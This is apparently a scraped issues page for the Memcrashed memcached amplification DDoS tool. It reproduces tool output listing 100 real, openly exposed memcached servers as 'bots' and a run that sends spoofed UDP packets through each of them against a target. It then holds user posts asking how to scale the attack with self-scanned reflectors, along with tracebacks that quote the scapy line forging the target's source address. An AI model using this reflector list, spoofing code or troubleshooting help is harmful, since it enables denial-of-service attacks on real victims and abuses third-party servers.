[+] Memcache Server (16) | IP: 123.30.157.244 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (17) | IP: 42.121.236.117 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (18) | IP: 139.199.184.33 | OS: None | ISP: Tencent cloud computing |
[+] Memcache Server (19) | IP: 216.98.10.213 | OS: None | ISP: Atlantic.Net - New York, NY |
[+] Memcache Server (20) | IP: 185.174.28.89 | OS: None | ISP: Corelux Internet ve Yazilim Hizmetleri Ticaret Lim |
[+] Memcache Server (21) | IP: 47.75.48.225 | OS: None | ISP: Alibaba |
[+] Memcache Server (22) | IP: 123.30.191.42 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (23) | IP: 91.224.140.37 | OS: None | ISP: Innovation IT Solutions LTD |
[+] Memcache Server (24) | IP: 149.56.165.165 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (25) | IP: 119.38.160.30 | OS: None | ISP: FoShan RuiJiang Science and Tech |
[+] Memcache Server (26) | IP: 123.30.139.46 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (27) | IP: 123.31.43.241 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (28) | IP: 119.23.21.215 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (29) | IP: 115.29.160.192 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (30) | IP: 149.202.44.25 | OS: None | ISP: OVH SAS |
[+] Memcache Server (31) | IP: 203.122.25.59 | OS: None | ISP: Citycom Networks Pvt |
[+] Memcache Server (32) | IP: 195.161.62.194 | OS: None | ISP: Avguro Technologies Ltd. Hosting service provider |
[+] Memcache Server (33) | IP: 185.12.124.76 | OS: None | ISP: QWARTA LLC |
[+] Memcache Server (34) | IP: 173.212.245.117 | OS: None | ISP: Contabo GmbH |
[+] Memcache Server (35) | IP: 1.60.17.28 | OS: None | ISP: China Unicom Heilongjiang |
[+] Memcache Server (36) | IP: 103.27.237.107 | OS: None | ISP: Long Van System Solution JSC |
[+] Memcache Server (37) | IP: 203.172.121.141 | OS: None | ISP: CS LoxInfo |
[+] Memcache Server (38) | IP: 134.213.30.27 | OS: None | ISP: Rackspace Ltd. |
[+] Memcache Server (39) | IP: 158.69.36.2 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (40) | IP: 72.14.186.34 | OS: None | ISP: Linode |
[+] Memcache Server (41) | IP: 5.39.57.88 | OS: None | ISP: OVH Hosting Limited |
[+] Memcache Server (42) | IP: 81.169.215.229 | OS: None | ISP: Strato AG |
[+] Memcache Server (43) | IP: 209.236.126.69 | OS: None | ISP: PrivateSystems Networks |
[+] Memcache Server (44) | IP: 192.99.25.230 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (45) | IP: 125.34.67.139 | OS: None | ISP: China Unicom Beijing |
[+] Memcache Server (46) | IP: 103.45.13.162 | OS: None | ISP: Shenzhen Qianhai bird cloud computing Co. |
[+] Memcache Server (47) | IP: 23.244.241.138 | OS: None | ISP: Enzu |
[+] Memcache Server (48) | IP: 62.176.2.210 | OS: None | ISP: Rial Com JSC |
[+] Memcache Server (49) | IP: 66.70.223.64 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (50) | IP: 61.9.48.146 | OS: None | ISP: SKYBroadband SKYCable Corporation |
[+] Memcache Server (51) | IP: 37.56.90.63 | OS: None | ISP: SaudiNet |
[+] Memcache Server (52) | IP: 108.61.246.84 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (53) | IP: 23.225.95.252 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (54) | IP: 207.210.68.42 | OS: None | ISP: Global Net Access, LLC |
[+] Memcache Server (55) | IP: 47.88.104.228 | OS: None | ISP: Alibaba |
[+] Memcache Server (56) | IP: 117.54.238.221 | OS: None | ISP: INDO Internet, PT |
[+] Memcache Server (57) | IP: 23.225.95.36 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (58) | IP: 172.247.51.143 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (59) | IP: 139.196.239.43 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (60) | IP: 173.201.27.39 | OS: None | ISP: GoDaddy.com, LLC |
[+] Memcache Server (61) | IP: 54.248.233.245 | OS: None | ISP: Amazon.com |
[+] Memcache Server (62) | IP: 123.30.128.176 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (63) | IP: 133.242.185.90 | OS: None | ISP: SAKURA Internet |
[+] Memcache Server (64) | IP: 113.120.61.246 | OS: None | ISP: China Telecom Shandong |
[+] Memcache Server (65) | IP: 114.7.34.18 | OS: None | ISP: PT Indosat Tbk. |
[+] Memcache Server (66) | IP: 117.103.206.12 | OS: None | ISP: VTC Multimedia Corporation |
[+] Memcache Server (67) | IP: 213.251.187.75 | OS: None | ISP: OVH SAS |
[+] Memcache Server (68) | IP: 220.164.24.38 | OS: None | ISP: China Telecom Yunnan |
[+] Memcache Server (69) | IP: 123.30.128.187 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (70) | IP: 172.247.51.58 | OS: Windows 7 or 8 | ISP: CloudRadium L.L.C |
[+] Memcache Server (71) | IP: 151.80.151.179 | OS: None | ISP: OVH SAS |
[+] Memcache Server (72) | IP: 153.122.27.24 | OS: None | ISP: Gmo Cloud K.k. |
[+] Memcache Server (73) | IP: 185.140.12.200 | OS: None | ISP: Majd Ngn Ict Development Pjsc |
[+] Memcache Server (74) | IP: 45.77.44.172 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (75) | IP: 112.137.167.32 | OS: None | ISP: TM-VADS DC Hosting |
[+] Memcache Server (76) | IP: 118.139.178.110 | OS: None | ISP: Virtual Private Hosting Service |
[+] Memcache Server (77) | IP: 109.123.155.96 | OS: None | ISP: Tomsk Polytechnic University |
[+] Memcache Server (78) | IP: 128.101.122.229 | OS: None | ISP: University of Minnesota |
[+] Memcache Server (79) | IP: 69.64.83.135 | OS: None | ISP: Codero |
[+] Memcache Server (80) | IP: 198.23.171.155 | OS: None | ISP: ColoCrossing |
[+] Memcache Server (81) | IP: 54.210.138.147 | OS: None | ISP: Amazon.com |
[+] Memcache Server (82) | IP: 95.158.131.144 | OS: None | ISP: Novatel LTD. |
[+] Memcache Server (83) | IP: 222.216.1.66 | OS: None | ISP: China Telecom Guangxi |
[+] Memcache Server (84) | IP: 181.112.145.251 | OS: None | ISP: Corporacion Nacional De Telecomunicaciones - Cnt E |
[+] Memcache Server (85) | IP: 118.31.71.231 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (86) | IP: 176.53.20.46 | OS: None | ISP: Radore Veri Merkezi Hizmetleri A.S. |
[+] Memcache Server (87) | IP: 111.231.110.149 | OS: None | ISP: Tencent cloud computing |
[+] Memcache Server (88) | IP: 89.175.27.177 | OS: None | ISP: MTS PJSC |
[+] Memcache Server (89) | IP: 198.50.191.110 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (90) | IP: 172.247.51.145 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (91) | IP: 211.149.200.233 | OS: None | ISP: Chengdu West Dimension Digital Technology Co. |
[+] Memcache Server (92) | IP: 182.253.226.85 | OS: None | ISP: Biznet Networks |
[+] Memcache Server (93) | IP: 176.31.147.158 | OS: None | ISP: OVH SAS |
[+] Memcache Server (94) | IP: 112.4.90.134 | OS: None | ISP: China Mobile |
[+] Memcache Server (95) | IP: 112.124.125.107 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (96) | IP: 77.81.164.139 | OS: None | ISP: Voxility S.R.L. |
[+] Memcache Server (97) | IP: 69.175.18.42 | OS: None | ISP: SingleHop |
[+] Memcache Server (98) | IP: 45.77.221.32 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (99) | IP: 123.31.19.98 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (100) | IP: 50.97.148.126 | OS: None | ISP: SoftLayer Technologies |

[*] Ready to engage target ***********? <Y/n>: y
[+] Sending 1 forged UDP packet to: 185.58.205.218
.[+] Sending 1 forged UDP packet to: 114.215.198.32
.[+] Sending 1 forged UDP packet to: 79.98.30.159
.[+] Sending 1 forged UDP packet to: 198.11.234.98
.[+] Sending 1 forged UDP packet to: 51.254.93.89
.[+] Sending 1 forged UDP packet to: 69.50.212.204
.[+] Sending 1 forged UDP packet to: 43.225.158.248
.[+] Sending 1 forged UDP packet to: 23.225.113.65
.[+] Sending 1 forged UDP packet to: 23.244.241.178
.[+] Sending 1 forged UDP packet to: 61.147.124.51
.[+] Sending 1 forged UDP packet to: 109.235.252.151
.[+] Sending 1 forged UDP packet to: 147.52.110.5
.[+] Sending 1 forged UDP packet to: 77.75.124.183
.[+] Sending 1 forged UDP packet to: 164.58.48.5
.[+] Sending 1 forged UDP packet to: 54.37.242.70
.[+] Sending 1 forged UDP packet to: 123.30.157.244
.[+] Sending 1 forged UDP packet to: 42.121.236.117
.[+] Sending 1 forged UDP packet to: 139.199.184.33
.[+] Sending 1 forged UDP packet to: 216.98.10.213
.[+] Sending 1 forged UDP packet to: 185.174.28.89
.[+] Sending 1 forged UDP packet to: 47.75.48.225
.[+] Sending 1 forged UDP packet to: 123.30.191.42
.[+] Sending 1 forged UDP packet to: 91.224.140.37
.[+] Sending 1 forged UDP packet to: 149.56.165.165
.[+] Sending 1 forged UDP packet to: 119.38.160.30
.[+] Sending 1 forged UDP packet to: 123.30.139.46
.[+] Sending 1 forged UDP packet to: 123.31.43.241
.[+] Sending 1 forged UDP packet to: 119.23.21.215
.[+] Sending 1 forged UDP packet to: 115.29.160.192
.[+] Sending 1 forged UDP packet to: 149.202.44.25
.[+] Sending 1 forged UDP packet to: 203.122.25.59
.[+] Sending 1 forged UDP packet to: 195.161.62.194
.[+] Sending 1 forged UDP packet to: 185.12.124.76
.[+] Sending 1 forged UDP packet to: 173.212.245.117
.[+] Sending 1 forged UDP packet to: 1.60.17.28
.[+] Sending 1 forged UDP packet to: 103.27.237.107
.[+] Sending 1 forged UDP packet to: 203.172.121.141
.[+] Sending 1 forged UDP packet to: 134.213.30.27
.[+] Sending 1 forged UDP packet to: 158.69.36.2
.[+] Sending 1 forged UDP packet to: 72.14.186.34
.[+] Sending 1 forged UDP packet to: 5.39.57.88
.[+] Sending 1 forged UDP packet to: 81.169.215.229
.[+] Sending 1 forged UDP packet to: 209.236.126.69
.[+] Sending 1 forged UDP packet to: 192.99.25.230
.[+] Sending 1 forged UDP packet to: 125.34.67.139
.[+] Sending 1 forged UDP packet to: 103.45.13.162
.[+] Sending 1 forged UDP packet to: 23.244.241.138
.[+] Sending 1 forged UDP packet to: 62.176.2.210
.[+] Sending 1 forged UDP packet to: 66.70.223.64
.[+] Sending 1 forged UDP packet to: 61.9.48.146
.[+] Sending 1 forged UDP packet to: 37.56.90.63
.[+] Sending 1 forged UDP packet to: 108.61.246.84
.[+] Sending 1 forged UDP packet to: 23.225.95.252
.[+] Sending 1 forged UDP packet to: 207.210.68.42
.[+] Sending 1 forged UDP packet to: 47.88.104.228
.[+] Sending 1 forged UDP packet to: 117.54.238.221
.[+] Sending 1 forged UDP packet to: 23.225.95.36
.[+] Sending 1 forged UDP packet to: 172.247.51.143
.[+] Sending 1 forged UDP packet to: 139.196.239.43
.[+] Sending 1 forged UDP packet to: 173.201.27.39
.[+] Sending 1 forged UDP packet to: 54.248.233.245
.[+] Sending 1 forged UDP packet to: 123.30.128.176
.[+] Sending 1 forged UDP packet to: 133.242.185.90
.[+] Sending 1 forged UDP packet to: 113.120.61.246
.[+] Sending 1 forged UDP packet to: 114.7.34.18
.[+] Sending 1 forged UDP packet to: 117.103.206.12
.[+] Sending 1 forged UDP packet to: 213.251.187.75
.[+] Sending 1 forged UDP packet to: 220.164.24.38
.[+] Sending 1 forged UDP packet to: 123.30.128.187
.[+] Sending 1 forged UDP packet to: 172.247.51.58
.[+] Sending 1 forged UDP packet to: 151.80.151.179
.[+] Sending 1 forged UDP packet to: 153.122.27.24
.[+] Sending 1 forged UDP packet to: 185.140.12.200
.[+] Sending 1 forged UDP packet to: 45.77.44.172
.[+] Sending 1 forged UDP packet to: 112.137.167.32
.[+] Sending 1 forged UDP packet to: 118.139.178.110
.[+] Sending 1 forged UDP packet to: 109.123.155.96
.[+] Sending 1 forged UDP packet to: 128.101.122.229
.[+] Sending 1 forged UDP packet to: 69.64.83.135
.[+] Sending 1 forged UDP packet to: 198.23.171.155
.[+] Sending 1 forged UDP packet to: 54.210.138.147
.[+] Sending 1 forged UDP packet to: 95.158.131.144
.[+] Sending 1 forged UDP packet to: 222.216.1.66
.[+] Sending 1 forged UDP packet to: 181.112.145.251
.[+] Sending 1 forged UDP packet to: 118.31.71.231
.[+] Sending 1 forged UDP packet to: 176.53.20.46
.[+] Sending 1 forged UDP packet to: 111.231.110.149
.[+] Sending 1 forged UDP packet to: 89.175.27.177
.[+] Sending 1 forged UDP packet to: 198.50.191.110
.[+] Sending 1 forged UDP packet to: 172.247.51.145
.[+] Sending 1 forged UDP packet to: 211.149.200.233
.[+] Sending 1 forged UDP packet to: 182.253.226.85
.[+] Sending 1 forged UDP packet to: 176.31.147.158
.[+] Sending 1 forged UDP packet to: 112.4.90.134
.[+] Sending 1 forged UDP packet to: 112.124.125.107
.[+] Sending 1 forged UDP packet to: 77.81.164.139
.[+] Sending 1 forged UDP packet to: 69.175.18.42
.[+] Sending 1 forged UDP packet to: 45.77.221.32
.[+] Sending 1 forged UDP packet to: 123.31.19.98
.[+] Sending 1 forged UDP packet to: 50.97.148.126
.
[•] Task complete! Exiting Platform. Have a wonderful day.

why only 100 ???

Run it using my IPs

How can i run this script without shodan's api key? I want to use my hosts that i scanned, can someone provide me sample bots.txt file so i know what's the bots.txt file structure? Thanks

How find IP's for bots.txt

I scanned servers by port 11211, and found about 20000 servers, but they are not working. Tell me, how can i find bots by scanning network.

Memcrashed.py Line 139 - NameError 'i' is not Defined Problem

Hello there,

I get this problem when i try to engage the target,
do someone know how to solve it?

Would you like to display all the bots from Shodan? <Y/n>: Y

[*] Ready to engage target 162.13.14.100? <Y/n>: y
Traceback (most recent call last):
File "Memcrashed.py", line 139, in
print('[+] Sending 2 forged synchronized payloads to: %s' % (i))
NameError: name 'i' is not defined
root@kali:~/Desktop/Memcrashed-DDoS-Exploit#

When i say no to display all the bots from shodan it looks he is gonna send bytes, but when i test it
on the test service from vedbex.com nothing happend.

Cheers Klapkaak078

PermissionError: [Errno 1] Operation not permitted

What is this error? How can i solve this?

*] Ready to engage target xxx.xxx.xx.xx? <Y/n>: Y
[+] Sending 2 forged synchronized payloads to: 114.215.114.108
Traceback (most recent call last):
File "Memcrashed.py", line 125, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
File "/home/name/.local/lib/python3.6/site-packages/scapy/sendrecv.py", line 289, in send
socket = conf.L3socket(*args, **kargs)
File "/home/name/.local/lib/python3.6/site-packages/scapy/arch/linux.py", line 407, in init
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
File "/usr/lib/python3.6/socket.py", line 144, in init
_socket.socket.init(self, family, type, proto, fileno)
PermissionError: [Errno 1] Operation not permitted

socket.gaierror: [Errno -9] Address family for hostname not supported

Traceback (most recent call last):
File "/usr/local/lib/python3.6/dist-packages/scapy/fields.py", line 238, in h2i
inet_aton(x)
OSError: illegal IP address string passed to inet_aton

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "Memcrashed.py", line 135, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
File "/usr/local/lib/python3.6/dist-packages/scapy/base_classes.py", line 240, in call
i.init(*args, **kargs)
File "/usr/local/lib/python3.6/dist-packages/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "/usr/local/lib/python3.6/dist-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x)
File "/usr/local/lib/python3.6/dist-packages/scapy/fields.py", line 240, in h2i
x = Net(x)
File "/usr/local/lib/python3.6/dist-packages/scapy/base_classes.py", line 90, in init
self.parsed,self.netmask = self._parse_net(net)
File "/usr/local/lib/python3.6/dist-packages/scapy/base_classes.py", line 83, in _parse_net
tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -9] Address family for hostname not supported

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.